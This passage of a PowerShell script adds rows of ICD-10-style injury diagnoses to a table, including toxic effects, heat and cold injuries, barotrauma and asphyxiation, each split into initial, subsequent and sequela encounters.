intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, assault","Toxic effect of nitroglycerin and other nitric acids and esters, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, assault","Toxic effect of nitroglycerin and other nitric acids and esters, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, assault","Toxic effect of nitroglycerin and other nitric acids and esters, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, undetermined","Toxic effect of nitroglycerin and other nitric acids and esters, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, undetermined","Toxic effect of nitroglycerin and other nitric acids and esters, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of nitroglycerin and other nitric acids and esters, undetermined","Toxic effect of nitroglycerin and other nitric acids and esters, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional)","Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional)","Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional)","Toxic effect of paints and dyes, not elsewhere classified, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm","Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm","Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm","Toxic effect of paints and dyes, not elsewhere classified, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, assault","Toxic effect of paints and dyes, not elsewhere classified, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, assault","Toxic effect of paints and dyes, not elsewhere classified, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, assault","Toxic effect of paints and dyes, not elsewhere classified, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, undetermined","Toxic effect of paints and dyes, not elsewhere classified, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, undetermined","Toxic effect of paints and dyes, not elsewhere classified, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of paints and dyes, not elsewhere classified, undetermined","Toxic effect of paints and dyes, not elsewhere classified, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, accidental (unintentional)","Toxic effect of latex, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, accidental (unintentional)","Toxic effect of latex, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, accidental (unintentional)","Toxic effect of latex, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, intentional self-harm","Toxic effect of latex, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, intentional self-harm","Toxic effect of latex, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, intentional self-harm","Toxic effect of latex, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, assault","Toxic effect of latex, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, assault","Toxic effect of latex, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, assault","Toxic effect of latex, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, undetermined","Toxic effect of latex, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, undetermined","Toxic effect of latex, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of latex, undetermined","Toxic effect of latex, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, accidental (unintentional)","Toxic effect of harmful algae and algae toxins, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, accidental (unintentional)","Toxic effect of harmful algae and algae toxins, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, accidental (unintentional)","Toxic effect of harmful algae and algae toxins, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, intentional self-harm","Toxic effect of harmful algae and algae toxins, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, intentional self-harm","Toxic effect of harmful algae and algae toxins, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, intentional self-harm","Toxic effect of harmful algae and algae toxins, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, assault","Toxic effect of harmful algae and algae toxins, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, assault","Toxic effect of harmful algae and algae toxins, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, assault","Toxic effect of harmful algae and algae toxins, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, undetermined","Toxic effect of harmful algae and algae toxins, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, undetermined","Toxic effect of harmful algae and algae toxins, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of harmful algae and algae toxins, undetermined","Toxic effect of harmful algae and algae toxins, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, accidental (unintentional)","Toxic effect of fiberglass, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, accidental (unintentional)","Toxic effect of fiberglass, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, accidental (unintentional)","Toxic effect of fiberglass, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, intentional self-harm","Toxic effect of fiberglass, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, intentional self-harm","Toxic effect of fiberglass, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, intentional self-harm","Toxic effect of fiberglass, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, assault","Toxic effect of fiberglass, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, assault","Toxic effect of fiberglass, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, assault","Toxic effect of fiberglass, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, undetermined","Toxic effect of fiberglass, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, undetermined","Toxic effect of fiberglass, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of fiberglass, undetermined","Toxic effect of fiberglass, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, accidental (unintentional)","Toxic effect of other specified substances, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, accidental (unintentional)","Toxic effect of other specified substances, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, accidental (unintentional)","Toxic effect of other specified substances, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, intentional self-harm","Toxic effect of other specified substances, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, intentional self-harm","Toxic effect of other specified substances, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, intentional self-harm","Toxic effect of other specified substances, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, assault","Toxic effect of other specified substances, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, assault","Toxic effect of other specified substances, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, assault","Toxic effect of other specified substances, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, undetermined","Toxic effect of other specified substances, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, undetermined","Toxic effect of other specified substances, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of other specified substances, undetermined","Toxic effect of other specified substances, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, accidental (unintentional)","Toxic effect of unspecified substance, accidental (unintentional), initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, accidental (unintentional)","Toxic effect of unspecified substance, accidental (unintentional), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, accidental (unintentional)","Toxic effect of unspecified substance, accidental (unintentional), sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, intentional self-harm","Toxic effect of unspecified substance, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, intentional self-harm","Toxic effect of unspecified substance, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, intentional self-harm","Toxic effect of unspecified substance, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, assault","Toxic effect of unspecified substance, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, assault","Toxic effect of unspecified substance, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, assault","Toxic effect of unspecified substance, assault, sequela") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, undetermined","Toxic effect of unspecified substance, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, undetermined","Toxic effect of unspecified substance, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Toxic effect of unspecified substance, undetermined","Toxic effect of unspecified substance, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Radiation sickness, unspecified","Radiation sickness, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Radiation sickness, unspecified","Radiation sickness, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Radiation sickness, unspecified","Radiation sickness, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Heatstroke and sunstroke","Heatstroke and sunstroke, initial encounter") + $null = $DiagnosisList.Rows.Add("Heatstroke and sunstroke","Heatstroke and sunstroke, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heatstroke and sunstroke","Heatstroke and sunstroke, sequela") + $null = $DiagnosisList.Rows.Add("Heat syncope","Heat syncope, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat syncope","Heat syncope, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat syncope","Heat syncope, sequela") + $null = $DiagnosisList.Rows.Add("Heat cramp","Heat cramp, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat cramp","Heat cramp, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat cramp","Heat cramp, sequela") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, anhydrotic","Heat exhaustion, anhydrotic, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, anhydrotic","Heat exhaustion, anhydrotic, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, anhydrotic","Heat exhaustion, anhydrotic, sequela") + $null = $DiagnosisList.Rows.Add("Heat exhaustion due to salt depletion","Heat exhaustion due to salt depletion, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion due to salt depletion","Heat exhaustion due to salt depletion, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion due to salt depletion","Heat exhaustion due to salt depletion, sequela") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, unspecified","Heat exhaustion, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, unspecified","Heat exhaustion, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat exhaustion, unspecified","Heat exhaustion, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Heat fatigue, transient","Heat fatigue, transient, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat fatigue, transient","Heat fatigue, transient, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat fatigue, transient","Heat fatigue, transient, sequela") + $null = $DiagnosisList.Rows.Add("Heat edema","Heat edema, initial encounter") + $null = $DiagnosisList.Rows.Add("Heat edema","Heat edema, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Heat edema","Heat edema, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of heat and light","Other effects of heat and light, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of heat and light","Other effects of heat and light, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of heat and light","Other effects of heat and light, sequela") + $null = $DiagnosisList.Rows.Add("Effect of heat and light, unspecified","Effect of heat and light, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Effect of heat and light, unspecified","Effect of heat and light, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effect of heat and light, unspecified","Effect of heat and light, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Hypothermia","Hypothermia, initial encounter") + $null = $DiagnosisList.Rows.Add("Hypothermia","Hypothermia, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Hypothermia","Hypothermia, sequela") + $null = $DiagnosisList.Rows.Add("Immersion hand, right hand","Immersion hand, right hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, right hand","Immersion hand, right hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, right hand","Immersion hand, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Immersion hand, left hand","Immersion hand, left hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, left hand","Immersion hand, left hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, left hand","Immersion hand, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Immersion hand, unspecified hand","Immersion hand, unspecified hand, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, unspecified hand","Immersion hand, unspecified hand, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion hand, unspecified hand","Immersion hand, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Immersion foot, right foot","Immersion foot, right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, right foot","Immersion foot, right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, right foot","Immersion foot, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Immersion foot, left foot","Immersion foot, left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, left foot","Immersion foot, left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, left foot","Immersion foot, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Immersion foot, unspecified foot","Immersion foot, unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, unspecified foot","Immersion foot, unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Immersion foot, unspecified foot","Immersion foot, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Chilblains","Chilblains, initial encounter") + $null = $DiagnosisList.Rows.Add("Chilblains","Chilblains, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Chilblains","Chilblains, sequela") + $null = $DiagnosisList.Rows.Add("Other specified effects of reduced temperature","Other specified effects of reduced temperature, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified effects of reduced temperature","Other specified effects of reduced temperature, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified effects of reduced temperature","Other specified effects of reduced temperature, sequela") + $null = $DiagnosisList.Rows.Add("Effect of reduced temperature, unspecified","Effect of reduced temperature, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Effect of reduced temperature, unspecified","Effect of reduced temperature, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effect of reduced temperature, unspecified","Effect of reduced temperature, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Otitic barotrauma","Otitic barotrauma, initial encounter") + $null = $DiagnosisList.Rows.Add("Otitic barotrauma","Otitic barotrauma, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Otitic barotrauma","Otitic barotrauma, sequela") + $null = $DiagnosisList.Rows.Add("Sinus barotrauma","Sinus barotrauma, initial encounter") + $null = $DiagnosisList.Rows.Add("Sinus barotrauma","Sinus barotrauma, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sinus barotrauma","Sinus barotrauma, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified effects of high altitude","Unspecified effects of high altitude, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of high altitude","Unspecified effects of high altitude, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified effects of high altitude","Unspecified effects of high altitude, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of high altitude","Other effects of high altitude, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of high altitude","Other effects of high altitude, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of high altitude","Other effects of high altitude, sequela") + $null = $DiagnosisList.Rows.Add("Caisson disease [decompression sickness]","Caisson disease [decompression sickness], initial encounter") + $null = $DiagnosisList.Rows.Add("Caisson disease [decompression sickness]","Caisson disease [decompression sickness], subsequent encounter") + $null = $DiagnosisList.Rows.Add("Caisson disease [decompression sickness]","Caisson disease [decompression sickness], sequela") + $null = $DiagnosisList.Rows.Add("Effects of high-pressure fluids","Effects of high-pressure fluids, initial encounter") + $null = $DiagnosisList.Rows.Add("Effects of high-pressure fluids","Effects of high-pressure fluids, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effects of high-pressure fluids","Effects of high-pressure fluids, sequela") + $null = $DiagnosisList.Rows.Add("Other effects of air pressure and water pressure","Other effects of air pressure and water pressure, initial encounter") + $null = $DiagnosisList.Rows.Add("Other effects of air pressure and water pressure","Other effects of air pressure and water pressure, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other effects of air pressure and water pressure","Other effects of air pressure and water pressure, sequela") + $null = $DiagnosisList.Rows.Add("Effect of air pressure and water pressure, unspecified","Effect of air pressure and water pressure, unspecified, initial encounter") + $null = $DiagnosisList.Rows.Add("Effect of air pressure and water pressure, unspecified","Effect of air pressure and water pressure, unspecified, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Effect of air pressure and water pressure, unspecified","Effect of air pressure and water pressure, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, accidental","Asphyxiation due to smothering under pillow, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, accidental","Asphyxiation due to smothering under pillow, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, accidental","Asphyxiation due to smothering under pillow, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, intentional self-harm","Asphyxiation due to smothering under pillow, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, intentional self-harm","Asphyxiation due to smothering under pillow, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, intentional self-harm","Asphyxiation due to smothering under pillow, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, assault","Asphyxiation due to smothering under pillow, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, assault","Asphyxiation due to smothering under pillow, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, assault","Asphyxiation due to smothering under pillow, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, undetermined","Asphyxiation due to smothering under pillow, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, undetermined","Asphyxiation due to smothering under pillow, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under pillow, undetermined","Asphyxiation due to smothering under pillow, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, accidental","Asphyxiation due to plastic bag, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, accidental","Asphyxiation due to plastic bag, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, accidental","Asphyxiation due to plastic bag, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, intentional self-harm","Asphyxiation due to plastic bag, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, intentional self-harm","Asphyxiation due to plastic bag, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, intentional self-harm","Asphyxiation due to plastic bag, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, assault","Asphyxiation due to plastic bag, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, assault","Asphyxiation due to plastic bag, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, assault","Asphyxiation due to plastic bag, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, undetermined","Asphyxiation due to plastic bag, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, undetermined","Asphyxiation due to plastic bag, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to plastic bag, undetermined","Asphyxiation due to plastic bag, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, accidental","Asphyxiation due to being trapped in bed linens, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, accidental","Asphyxiation due to being trapped in bed linens, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, accidental","Asphyxiation due to being trapped in bed linens, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, intentional self-harm","Asphyxiation due to being trapped in bed linens, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, intentional self-harm","Asphyxiation due to being trapped in bed linens, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, intentional self-harm","Asphyxiation due to being trapped in bed linens, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, assault","Asphyxiation due to being trapped in bed linens, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, assault","Asphyxiation due to being trapped in bed linens, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, assault","Asphyxiation due to being trapped in bed linens, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, undetermined","Asphyxiation due to being trapped in bed linens, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, undetermined","Asphyxiation due to being trapped in bed linens, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to being trapped in bed linens, undetermined","Asphyxiation due to being trapped in bed linens, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), accidental","Asphyxiation due to smothering under another person's body (in bed), accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), accidental","Asphyxiation due to smothering under another person's body (in bed), accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), accidental","Asphyxiation due to smothering under another person's body (in bed), accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), assault","Asphyxiation due to smothering under another person's body (in bed), assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), assault","Asphyxiation due to smothering under another person's body (in bed), assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), assault","Asphyxiation due to smothering under another person's body (in bed), assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), undetermined","Asphyxiation due to smothering under another person's body (in bed), undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), undetermined","Asphyxiation due to smothering under another person's body (in bed), undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering under another person's body (in bed), undetermined","Asphyxiation due to smothering under another person's body (in bed), undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, accidental","Asphyxiation due to smothering in furniture, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, accidental","Asphyxiation due to smothering in furniture, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, accidental","Asphyxiation due to smothering in furniture, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, intentional self-harm","Asphyxiation due to smothering in furniture, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, intentional self-harm","Asphyxiation due to smothering in furniture, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, intentional self-harm","Asphyxiation due to smothering in furniture, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, assault","Asphyxiation due to smothering in furniture, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, assault","Asphyxiation due to smothering in furniture, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, assault","Asphyxiation due to smothering in furniture, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, undetermined","Asphyxiation due to smothering in furniture, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, undetermined","Asphyxiation due to smothering in furniture, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to smothering in furniture, undetermined","Asphyxiation due to smothering in furniture, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, accidental","Asphyxiation due to hanging, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, accidental","Asphyxiation due to hanging, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, accidental","Asphyxiation due to hanging, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, intentional self-harm","Asphyxiation due to hanging, intentional self-harm, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, intentional self-harm","Asphyxiation due to hanging, intentional self-harm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, intentional self-harm","Asphyxiation due to hanging, intentional self-harm, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, assault","Asphyxiation due to hanging, assault, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, assault","Asphyxiation due to hanging, assault, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, assault","Asphyxiation due to hanging, assault, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, undetermined","Asphyxiation due to hanging, undetermined, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, undetermined","Asphyxiation due to hanging, undetermined, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to hanging, undetermined","Asphyxiation due to hanging, undetermined, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, accidental","Asphyxiation due to mechanical threat to breathing due to other causes, accidental, initial encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, accidental","Asphyxiation due to mechanical threat to breathing due to other causes, accidental, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, accidental","Asphyxiation due to mechanical threat to breathing due to other causes, accidental, sequela") + $null = $DiagnosisList.Rows.Add("Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm","Asphyxiation due to mechanical threat to breathing due to other causes, intentional self-harm, 